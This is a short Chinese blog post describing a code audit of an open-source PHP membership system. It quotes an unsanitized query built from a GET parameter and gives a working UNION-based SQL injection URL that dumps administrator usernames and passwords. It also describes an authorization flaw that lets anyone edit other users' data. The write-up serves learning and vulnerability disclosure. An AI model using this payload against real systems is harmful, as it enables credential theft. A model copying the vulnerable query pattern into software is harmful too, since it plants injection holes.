记一次简单的代码审计

最新推荐文章于 2024-06-12 09:34:52 发布
最新推荐文章于 2024-06-12 09:34:52 发布
阅读量663 收藏 1
点赞数

这段时间在想着做个高校的会员管理系统,所以在chrome上装了个掘金插件,今天发现日推推了个类似的PHP写的小程序

本着能省就省,有自行车还造什么轮子的原则
于是乎

git clone https://github.com/chaodada/member.git

经过简单的部署后算是能打开了



后台UI做的真心差评

然后简单的看了下代码,发现几个SQL注入和一个越权

SQL注入

程序使用PDO连接数据库,后台使用了预编译SQL指令,没多大问题
看看前台用户处
xiu.php

if (isset($_GET['id'])) {
    $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
    $res = $pdo->query($sql);
    list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
}

很明显的GET型注入
爆管理员密码的payload:

http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23

越权

同样还是刚才那个位置


id修改后即可更改任意用户信息

总结

这套程序距离实用还有不小的距离 适合入门级选手审计练手
程序下载地址:https://github.com/chaodada/member.git

张悠悠66
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码审计】专栏文章汇总
武天旭的博客
03-04 4387
代码审计基础 代码审计基础 源代码审计思路(上) 源代码审计思路(下) 常见漏洞审计 认证会话管理(上) 认证会话管理(下) 输入输出验证 授权管理审计 业务安全审计 第三方组件审计
一次SEMCMS代码审计1
08-03
【文章标题】:SEMCMS代码审计详解:一次实践案例分析 【文章描述】:本文主要探讨了一次针对SEMCMS代码的审计过程,重点涉及SQL注入和XSS注入的安全问题。通过对源代码的深入分析,揭示了系统在过滤和防御机制上的...
java常用工具类_对一次java代码审计的学习
weixin_39540271的博客
12-03 78
0x01 前言前段时间审计的项目~也是第一次审计java,跟表哥们分享一下。一个电子对账系统,大部分是数据统计等功能,使用hibernate+Struts2+spring 框架,Oracle数据库,分前台后台两个项目,前台功能较单一就不说了,主要审计的后台。。开发商说是个老项目了,2333,拿来练手还是不错的。0x02 项目分析先看src文件夹下,主要的逻辑处理代码,数据库操作代码等都存...
推荐项目:weAudit - 协作代码审查利器
最新发布
gitblog_00021的博客
06-12 876
推荐项目:weAudit - 协作代码审查利器 项目地址:https://gitcode.com/trailofbits/vscode-weaudit 在当今快速发展的软件工程领域,代码审查是确保项目质量的关键步骤之一。为了简化这一过程并提升团队协作效率,Trail of Bits公司推出了一个创新的Visual Studio Code插件——weAudit。今天,我们就来深入了解这款变革性的代码...
Java代码审计文章
soldi_er的博客
07-15 346
  代码审计是相对高效的漏洞挖掘方法,哪怕逐渐产生xcheck等使用污点分析的自动化审计软件,也仍然需要具有审计功底的工程师人工验证漏洞报告,甚至开发更佳的审计软件。有时觉得代码审计繁琐,但其实黑盒更繁琐且容易失去重心,辛勤的黑盒漏洞挖掘,可能还不如审出一个框架的CVE来的实在,。安全基于代码,更高于代码,代码审计是安全的精髓之一。   有一个不停内耗的疑惑:究竟是不断地追求成果,还是十年板凳无人问、一朝漏洞世人知?也许我们更应该关注自己。另外安全是项目繁杂的,不断地有项目和事务向我们砸来,我们对某方面技术
代码审计文章资源汇总
王嘟嘟的博客
10-12 3480
0x00 前言 如饥似渴的学习。 0x01 文章 0x02 资源 1.DVWA https://www.lanzous.com/i236f2d
java代码审计文章集合
糖小喵
05-06 390
java环境基础 搭建Java Web开发环境 配置IDEA编辑器开发java web,从0创建项目 IDEA动态调试 IDEA配置tomcat maven配置和IDEA创建maven项目 IDEA如何导入eclipse项目 java基础环境配置,来自漏洞社区 java语法知识 菜鸟教程 理解java的三大特性之封装 理解java的三大特性之继承 理解java的三大特性之多...
[HACK学习呀] - 2020-11-05 一次代码审计到申请CVE到过程1
08-03
本文以作者的一次亲身经历,分享了从代码审计到申请CVE(Common Vulnerabilities and Exposures,常见漏洞和暴露)的过程,旨在帮助初学者理解并掌握这一过程。 首先,【学习思路】部分强调了自学过程中搜索引擎和...
一次有趣的tp5代码执行1
08-03
5. **代码审计**:定期进行代码审计,发现并修复潜在的安全问题。 总结,这个事件展示了如何在面临WAF和函数禁用的情况下,通过编码和`php://filter`伪协议绕过防护措施,执行恶意代码。对于开发者和运维人员来说,...
一次利用mssql上线1
08-03
本文录了一次通过Microsoft SQL Server(简称MSSQL)进行上线操作的安全测试过程。在渗透测试中,当主要网站未发现明显漏洞时,转向子站点进行深度挖掘。在子站上,检测到了一个MSSQL注入漏洞,这是由于SQL查询...
python 代码审计项目.zip
01-17
Git是常用的版本控制系统,它录了代码的每一次修改,便于团队协作和回溯。文档应当清晰地解释项目结构、代码逻辑以及如何运行和测试代码,如使用README.md文件。 综上所述,"python 代码审计项目.zip"涵盖了...
阿里代码审计插件
03-26
插件,阿里审查代码插件插件插件插件插件插件
VisualCodeGrepper(VCG)-代码审计.zip
05-03
VisualCodeGrepper(VCG)-代码审计.zip
vscode入门教程之页面启动与代码调试
10-15
VScode是微软推出的一款轻量级的编辑器,采用了和VS相同的UI界面。今天小编给大家带来一篇如何使用vscode来进行最基本的工作的小教程,希望大家能够喜欢
代码审计篇入门
Grey的博客
07-13 2735
一、漏洞挖掘与防范1.搭建环境<?php header("content-type:text/html;charset=utf-8"); //设置编码 $uid = $_GET['id']; $sql = "SELECT * FROM userinfo where id = $uid"; $conn = mysql_connect('localhost','root','root'); my...
idea java代码审计必备插件
Thunderclap的博客
07-05 3527
idea代码审计常用插件
N2-审计方法与步骤
尐猴子君ii的博客
07-19 273
一、基础准备1.获得源码大部分PHP程序都是开源的、找到官网下载最新的源码包即可。2.安装网站在本地搭建网站,一边审计一边调试。实时跟踪各种动态变化。二、把握大局1.网站结构浏览源码文件夹,了解该程序大致目录。2.入口文件index.php、admin.php文件一般是整个程序的入口,详细读一下index文件可以知道程序的架构、运行流畅、包含哪些配置文件,...
代码审计】—JAVA项目注入、上传、插件挖掘
haoaaao的博客
08-06 522
代码审计】—JAVA项目注入、上传、插件挖掘
代码审计—DWVA—Command InjectionL—High
王嘟嘟的博客
11-14 452
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 这个是命令行注入High级别好吧。我承认我不会我们来直接看源码。 这里这么多的过滤规则。 这里可以使用 |来进行绕过。 ...
sap 有办法查某个事物代码,布局的操作录吗
07-15
系统日志录了用户对事物代码的每一次操作,包括创建、修改和删除等操作。可以通过系统日志来追踪和查看事物代码的操作历史录。 另外,SAP还提供了事务代码的审计功能。通过启用审计功能,可以录并跟踪对事务...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值